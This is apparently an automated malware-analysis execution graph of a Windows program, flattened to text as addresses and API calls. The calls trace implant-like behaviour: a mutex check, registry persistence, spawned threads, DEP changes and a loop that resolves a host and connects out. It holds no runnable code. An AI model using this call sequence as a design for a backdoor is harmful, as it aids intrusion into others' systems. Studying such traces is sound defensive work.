                                  [Execution graph: the interactive call graph does not survive as text; its node identifiers, function addresses and edge list have been condensed to this summary. The nodes visible in the graph data lie in the 0x0040xxxx, 0x00970000 and 0x1054xxxx address ranges and are labelled with the APIs they reach, among them connect, closesocket, CreateThread, SetEvent, OpenSCManagerA, VirtualAlloc, LoadLibraryA, GetPEB, RtlExitUserThread, _wsystem, _onexit and __dllonexit, alongside many std::basic_string helper calls.]
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 21940->21925 21941->21932 21943 411400 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ EnumServicesStatusW 21942->21943 21944 4113e6 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 21942->21944 21946 411442 GetLastError 21943->21946 21947 4116da CloseServiceHandle ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 21943->21947 21945 4116fd 21944->21945 21945->21934 21946->21947 21948 411453 malloc EnumServicesStatusW 21946->21948 21947->21945 21949 411485 21948->21949 21950 4116cf free 21948->21950 21951 411490 11 API calls 21949->21951 21950->21947 21963 412756 _itow ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 21951->21963 21953 411530 7 API calls 21954 4116b4 CloseServiceHandle 21953->21954 21955 41159a GetLastError 21953->21955 21954->21950 21954->21951 21955->21954 21956 4115a9 malloc QueryServiceConfigW 21955->21956 21964 412756 _itow ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 21956->21964 21958 4115d6 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 21965 412756 _itow ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 21958->21965 21960 411611 12 API calls 21960->21954 21961->21936 21962->21940 21963->21953 21964->21958 21965->21960 15609 990000 15612 413fa4 __set_app_type __p__fmode __p__commode 15609->15612 15610 99001f 15613 414013 15612->15613 15614 414027 15613->15614 15615 41401b __setusermatherr 15613->15615 15624 41411a _controlfp 
15614->15624 15615->15614 15617 41402c _initterm __getmainargs _initterm 15618 414080 GetStartupInfoA 15617->15618 15620 4140b4 GetModuleHandleA 15618->15620 15625 408c98 15620->15625 15624->15617 15856 409823 15625->15856 15627 408cad ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15862 4129eb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 15627->15862 15629 408cd5 15876 40a154 15629->15876 15631 408ce5 15896 4017dd 15631->15896 15634 408d81 15901 40180c 15634->15901 15635 408d22 ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH 15636 40180c 4 API calls 15635->15636 15639 408d40 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@ ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15636->15639 15638 408d8a ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15640 40180c 4 API calls 15638->15640 15641 40981c exit _XcptFilter 15639->15641 15642 408daa ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15640->15642 15641->15610 15643 40180c 4 API calls 15642->15643 15644 408df3 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 15643->15644 15645 40180c 4 API calls 15644->15645 15646 408e0f ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 15645->15646 15647 408e72 OpenMutexA 15646->15647 15648 408e29 
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15646->15648 15649 408ea2 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15647->15649 15650 408e8d WaitForSingleObject CloseHandle 15647->15650 15651 40b4c8 3 API calls 15648->15651 15905 40b4c8 RegOpenKeyExA 15649->15905 15650->15649 15653 408e48 15651->15653 15653->15647 15655 408e4f ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15653->15655 15654 408ebe 15656 408edd 15654->15656 15657 408ec5 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15654->15657 16024 40b95b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15655->16024 15660 40180c 4 API calls 15656->15660 15659 40b95b 17 API calls 15657->15659 15659->15656 15662 408ee9 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateMutexA GetLastError 15660->15662 15661 408e67 16031 40a906 CreateMutexA GetModuleFileNameW ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15661->16031 15664 408f17 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15662->15664 15665 408f1f 15662->15665 15664->15641 15908 409908 LoadLibraryA GetProcAddress 15665->15908 15669 408f24 GetModuleFileNameW 15913 412aeb 15669->15913 15673 408f58 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15674 408f78 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 15673->15674 15676 408f98 15674->15676 15677 408fe9 15676->15677 15679 40180c 4 API calls 15676->15679 15678 40180c 4 API calls 15677->15678 
15680 409018 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15678->15680 15681 408fad ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15679->15681 15682 409024 15680->15682 15683 409029 15680->15683 15681->15677 15684 408fb9 15681->15684 16094 40a0e1 CreateProcessA CloseHandle CloseHandle 15682->16094 15686 40180c 4 API calls 15683->15686 15684->15677 15688 408fc9 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 15684->15688 15689 408feb ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15684->15689 15687 409032 15686->15687 15922 412881 7 API calls 15687->15922 15688->15677 15692 408fe4 15688->15692 16076 40b47f RegOpenKeyExA 15689->16076 16068 4031f8 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15692->16068 15693 40903c ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15696 40180c 4 API calls 15693->15696 15698 40905c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15696->15698 15697 40900a 16079 4030ec 15697->16079 15700 40180c 4 API calls 15698->15700 15701 409077 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15700->15701 15702 40180c 4 API calls 15701->15702 15703 409092 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15702->15703 15704 40180c 4 API calls 15703->15704 15705 4090ad ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15704->15705 15706 40914d 15705->15706 15707 4090bd 15705->15707 15708 409314 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15706->15708 15710 409201 
??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 15706->15710 15711 409167 15706->15711 15709 40180c 4 API calls 15707->15709 16175 40b692 RegOpenKeyExA 15708->16175 15712 4090c6 15709->15712 15715 40920e 8 API calls 15710->15715 15714 40180c 4 API calls 15711->15714 16095 412881 7 API calls 15712->16095 15719 409170 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15714->15719 15923 40b8f8 15715->15923 15717 40936a ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 15718 40937f 15717->15718 15722 40180c 4 API calls 15718->15722 15723 40180c 4 API calls 15719->15723 15721 4090d0 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ wcslen ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15721->15706 15725 4090f1 15721->15725 15726 409388 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 15722->15726 15727 409187 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15723->15727 15724 40927d ??3@YAXPAX 15728 40180c 4 API calls 15724->15728 15729 40180c 4 API calls 15725->15729 15731 4093a7 15726->15731 15732 4093ab 15726->15732 15733 40180c 4 API calls 15727->15733 15734 40929c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15728->15734 15730 4090fa 15729->15730 16096 412881 7 API calls 15730->16096 16178 413d3d AllocConsole 15731->16178 15732->15731 15737 4093c2 15732->15737 15738 40919e 15733->15738 15929 40b708 RegCreateKeyA 15734->15929 15743 40180c 4 API calls 15737->15743 16097 412881 7 API calls 15738->16097 15740 4092c8 15745 40180c 4 API calls 15740->15745 15741 409104 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 15746 40180c 4 API calls 15741->15746 15748 4093cb 
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ 15743->15748 15744 4091a8 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 15749 40180c 4 API calls 15744->15749 15750 4092d9 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 15745->15750 15751 409118 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15746->15751 15747 4093b5 CreateThread 15747->15737 15752 40180c 4 API calls 15748->15752 15753 4091bc 15749->15753 15750->15718 15754 4092ea 15750->15754 15755 4135de 37 API calls 15751->15755 15756 4093f5 15752->15756 16098 412881 7 API calls 15753->16098 15758 40180c 4 API calls 15754->15758 15759 40912c ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15755->15759 15934 412881 7 API calls 15756->15934 15762 4092f3 15758->15762 15759->15706 15761 4091c6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 15766 40180c 4 API calls 15761->15766 16132 412795 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15762->16132 15763 4093ff ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15764 409474 15763->15764 15765 40941b 15763->15765 15771 40180c 4 API calls 15764->15771 15768 40180c 4 API calls 15765->15768 15769 4091da ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15766->15769 15772 409424 15768->15772 
16099 407e37 wcslen 15769->16099 15770 4092ff 16135 409a2f GetModuleFileNameW ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 15770->16135 15775 40947d 15771->15775 16182 412881 7 API calls 15772->16182 15935 412881 7 API calls 15775->15935 15780 40942e ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 15782 40180c 4 API calls 15780->15782 15781 409487 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 15783 40180c 4 API calls 15781->15783 15784 409442 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15782->15784 15785 40949b ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15783->15785 15787 4135de 37 API calls 15784->15787 15936 4135de ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ 15785->15936 15789 409456 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15787->15789 15788 4094af ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15790 40180c 4 API calls 15788->15790 15791 409528 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15789->15791 15792 4094d9 15790->15792 15793 40180c 4 API calls 15791->15793 16183 412881 7 API calls 15792->16183 15795 409537 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 15793->15795 15797 40180c 4 API calls 15795->15797 15796 4094e3 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 
??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15796->15791 15798 409562 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15797->15798 15799 409580 15798->15799 15800 40959e ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 15798->15800 15802 409583 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 15799->15802 15803 4095b7 15799->15803 16187 405180 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 15800->16187 16184 405232 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 15802->16184 15804 40180c 4 API calls 15803->15804 15806 4095c0 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15804->15806 15808 409602 15806->15808 15809 4095cd ??2@YAPAXI 15806->15809 15807 40959c 15807->15803 15811 40180c 4 API calls 15808->15811 15810 40180c 4 API calls 15809->15810 15812 4095e3 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateThread 15810->15812 15813 40960b ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15811->15813 15812->15808 15814 409618 ??2@YAPAXI 15813->15814 15815 40964e 15813->15815 15816 40180c 4 API calls 15814->15816 15817 40180c 4 API calls 15815->15817 15818 40962f ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ CreateThread 15816->15818 15819 409657 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15817->15819 15818->15815 15820 409664 15819->15820 15821 4096be 15819->15821 15822 40180c 4 API calls 15820->15822 15823 40180c 4 API calls 15821->15823 15824 409674 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15822->15824 15825 4096c7 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15823->15825 15826 40180c 4 API calls 15824->15826 15827 4096d4 15825->15827 15828 40970c 15825->15828 15830 409686 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15826->15830 
15831 40180c 4 API calls 15827->15831 15950 412163 15828->15950 16197 41358b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15830->16197 15834 4096dd ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 15831->15834 15832 409715 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15835 409734 SetProcessDEPPolicy 15832->15835 15836 409737 CreateThread 15832->15836 15838 40180c 4 API calls 15834->15838 15835->15836 15839 409757 15836->15839 15840 40974b CreateThread 15836->15840 17141 409d3c 15836->17141 15837 40969a ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE CreateThread 15837->15821 15841 4096f7 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15838->15841 15842 40976b 15839->15842 15843 40975f CreateThread 15839->15843 15840->15839 16202 407a0a 15841->16202 15846 409774 15842->15846 15847 4097bd ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15842->15847 15843->15842 15848 409803 15846->15848 15849 40977b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15846->15849 15850 41203b 13 API calls 15847->15850 15952 40c81c 15848->15952 16211 41203b 15849->16211 15851 4097b5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15850->15851 15851->15848 16214 409d02 FindResourceA LoadResource LockResource SizeofResource 15856->16214 15858 40983c malloc 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE malloc 15859 4098cb 15858->15859 16215 40309e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15859->16215 15861 4098e0 free ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15861->15627 16220 40a139 15862->16220 15864 412a0c ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15865 412a84 15864->15865 15866 412a1f ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I 15864->15866 16225 4137f5 15865->16225 15867 412a86 ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15866->15867 15868 412a38 ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15866->15868 15871 41383d 7 API calls 15867->15871 16221 41383d 15868->16221 15871->15865 15874 4017dd 3 API calls 15875 412ac9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15874->15875 15875->15629 15877 40a167 15876->15877 15894 40a1a1 15876->15894 15878 40a1b6 15877->15878 15879 40a17b 15877->15879 15880 40a208 15878->15880 15887 40a1ca 15878->15887 16304 40a2a7 15879->16304 15882 40184b 2 API calls 15880->15882 15885 40a215 15882->15885 
15884 40184b 2 API calls 15884->15894 16308 4018db ??3@YAXPAX 15885->16308 15889 40a2a7 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 15887->15889 15888 40a229 15890 4018c8 ??2@YAPAXI 15888->15890 15891 40a1f0 15889->15891 15892 40a23a 15890->15892 15893 40a27b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15891->15893 15895 40a27b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15892->15895 15893->15894 15894->15631 15895->15894 15897 40184b 2 API calls 15896->15897 15898 4017eb 15897->15898 16309 4018db ??3@YAXPAX 15898->16309 15900 4017ff 15900->15634 15900->15635 15902 401818 15901->15902 15904 401826 15902->15904 16310 401895 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@ _CxxThrowException 15902->16310 15904->15638 15906 40b4f1 RegQueryValueExA RegCloseKey 15905->15906 15907 40b51e 15905->15907 15906->15654 15907->15654 15909 409935 GetModuleHandleA GetProcAddress 15908->15909 15910 409949 LoadLibraryA GetProcAddress 15908->15910 15909->15910 15911 409966 GetModuleHandleA GetProcAddress 15910->15911 15912 40997a 18 API calls 15910->15912 15911->15912 15912->15669 15914 412af8 GetCurrentProcess 15913->15914 15915 408f3a 15913->15915 15914->15915 15916 40b522 15915->15916 15917 40b53e RegOpenKeyExA 15916->15917 15919 40b58a 15917->15919 15920 40b55b RegQueryValueExA RegCloseKey 15917->15920 15921 40b593 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15919->15921 15920->15921 15921->15673 15922->15693 15924 40b913 15923->15924 15925 40309e 4 API calls 15924->15925 15926 40b928 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15925->15926 15927 40b708 7 API calls 15926->15927 15928 40b948 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15927->15928 
15928->15724 15930 40b767 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15929->15930 15931 40b71f ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegSetValueExA RegCloseKey 15929->15931 15930->15740 15932 40b756 15931->15932 15933 40b758 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15931->15933 15932->15933 15933->15740 15934->15763 15935->15781 15937 413731 12 API calls 15936->15937 15938 413604 15936->15938 15937->15788 15939 413615 15938->15939 15940 41360b _wgetenv ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 15938->15940 15941 413648 15938->15941 16314 412100 GetModuleFileNameW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15939->16314 15940->15937 15943 412aeb GetCurrentProcess 15941->15943 15945 41364d 15943->15945 15947 413651 7 API calls 15945->15947 15948 4136b2 7 API calls 15945->15948 15946 413621 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 15949 4136aa ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 15946->15949 15947->15949 15948->15949 15949->15937 15951 412183 6 API calls 15950->15951 15951->15832 16315 412407 15952->16315 15954 40c834 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 15955 40180c 4 API calls 15954->15955 15956 40c853 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 15955->15956 15957 40c876 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15956->15957 15958 40c869 Sleep 15956->15958 15959 40180c 4 API calls 15957->15959 15958->15957 15960 
40c892 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15959->15960 15961 4129eb 21 API calls 15960->15961 16021 40c8a7 15961->16021 15964 40180c 4 API calls 15965 40c8df ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 15964->15965 15966 4129eb 21 API calls 15965->15966 15969 40c8f4 15966->15969 15967 40180c 4 API calls 15967->15969 15968 40180c 4 API calls 15970 40c926 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 15968->15970 15969->15967 15969->15968 15971 40180c 4 API calls 15969->15971 15972 41203b 13 API calls 15970->15972 15973 40c999 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ gethostbyname 15971->15973 15974 40c96c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 15972->15974 15973->16021 15974->15969 15975 40180c 4 API calls 15976 40c9d5 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi htons 15975->15976 15976->16021 15977 4017dd 3 API calls 15977->16021 15978 40180c 4 API calls 15980 40d27c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi Sleep 15978->15980 15979 40ca34 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 15979->16021 15980->16021 15981 40180c 4 API calls 15983 40ca08 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 